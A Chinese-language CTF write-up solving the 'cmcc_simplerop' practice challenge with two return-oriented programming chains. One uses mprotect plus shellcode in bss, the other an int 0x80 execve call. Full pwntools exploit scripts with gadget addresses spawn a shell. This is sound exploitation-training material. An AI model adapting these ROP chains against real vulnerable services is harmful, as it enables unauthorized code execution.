CTF实战练习Cmcc_simplerop

Delina

原文链接：CTF实战练习Cmcc_simplerop
​
一
题目复现

​

函数很多，没有打印函数的plt，无法ret2libc。

​

主函数可溢出：
​
存在mprotect，可以改变bss权限后，在bss写入shell代码。

存在int 0x80,可以调整寄存器利用中断执行sh。

因此本题有两种思路。
二
解题思路
方法一：
先用mprotect改写bss段权限，用read函数在bss段写入shell代码。
方法二：
由于文件中没用binsh字符串，先用read函数在bss段写入‘/bin/sh’，再调整寄存器执行exec函数。
三
调试过程
方法一
先找bss段位置。

​

mprotect参数如下，实际操作时len取0x1000，addr要略比实际靠前，取0x80ef00，prot取二进制111，即为7。

​

执行完函数需要pop3执行后面的函数，都可以用。
​
read函数参数为0，bss地址，0x100。
方法二

int 80(eax,ebx,ecx,edx):eax为11，ebx为’/bin/sh’地址,ecx,edx缺省。

​

此题栈比较奇怪，与ida不符，需要自己调试，下面是调试技术的展示。
​
​
​
gdb断点应该更直观。
得到ret地址位移为0x20，考虑原因：这道题应该不是我们平常做的c语言编译器得到的，elf结构比较奇怪，所以栈也有所不同。

​

​
四

Payload


方法一

1. from pwn import *
   
2. context.log_level = 'debug'
   
3. context.arch = 'i386'
   
4. 
   
5. io = process('./simplerop')
   
6. #io = remote('node4.buuoj.cn',25205)
   
7. elf = ELF('./simplerop')
   
8. main_addr = 0x8048e26
   
9. read_addr = 0x806cd50
   
10. #pop_eax = 0x80bae06
    
11. pop_edx_ecx_ebx = 0x806e850
    
12. #int80_addr = 0x80493e1
    
13. binsh_addr = 0x80eaf80
    
14. mprotect_addr = 0x806d870
    
15. #binsh_addr = 0x80eb584
    
16. 
    
17. payload = b'a'*0x20 + p32(mprotect_addr) + p32(pop_edx_ecx_ebx) + p32(0x80ea000) + p32(0x1000) + p32(7)
    
18. payload += p32(read_addr) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x100)
    
19. payload += p32(binsh_addr)
    
20. 
    
21. 
    
22. io.sendlineafter('it',payload)
    
23. sleep(0.2)
    
24. 
    
25. payload2 = asm(shellcraft.sh())
    
26. io.sendline(payload2)
    
27. 
    
28. io.interactive()

复制代码

方法二

1. from pwn import *
   
2. context.log_level = 'debug'
   
3. context.arch = 'i386'
   
4. 
   
5. io = process('./simplerop')
   
6. #io = remote('node4.buuoj.cn',25205)
   
7. elf = ELF('./simplerop')
   
8. main_addr = 0x8048e26
   
9. read_addr = 0x806cd50
   
10. pop_eax = 0x80bae06
    
11. pop_edx_ecx_ebx = 0x806e850
    
12. pop_ebx = 0x80481c9
    
13. int80_addr = 0x80493e1
    
14. binsh_addr = 0x80eaf80
    
15. #binsh_addr = 0x80eb584
    
16. 
    
17. payload = b'a' * 0x20  + p32(read_addr) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8)
    
18. payload += p32(pop_eax) + p32(11) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) +p32(binsh_addr) + p32(int80_addr)
    
19. #payload += p32(pop_eax) + p32(11) + p32(pop_ebx) + p32(binsh_addr) + p32(int80_addr)
    
20. io.sendline(payload)
    
21. io.sendline(b'/bin/sh\x00')
    
22. 
    
23. io.interactive()

复制代码

五

未解决问题


未解决的问题1：法二中，网上payload设置binsh的地址，不能在本地调试到结果（远程却可以），报错“set_thread_area failed”，但binsh地址改为bss地址本地成功。

未解决的问题2：法二中，ecx,edx应该是可以缺省的，但我只pop_ebx就会报错“set_thread_area failed”。

希望有师傅可以交流解决上述问题！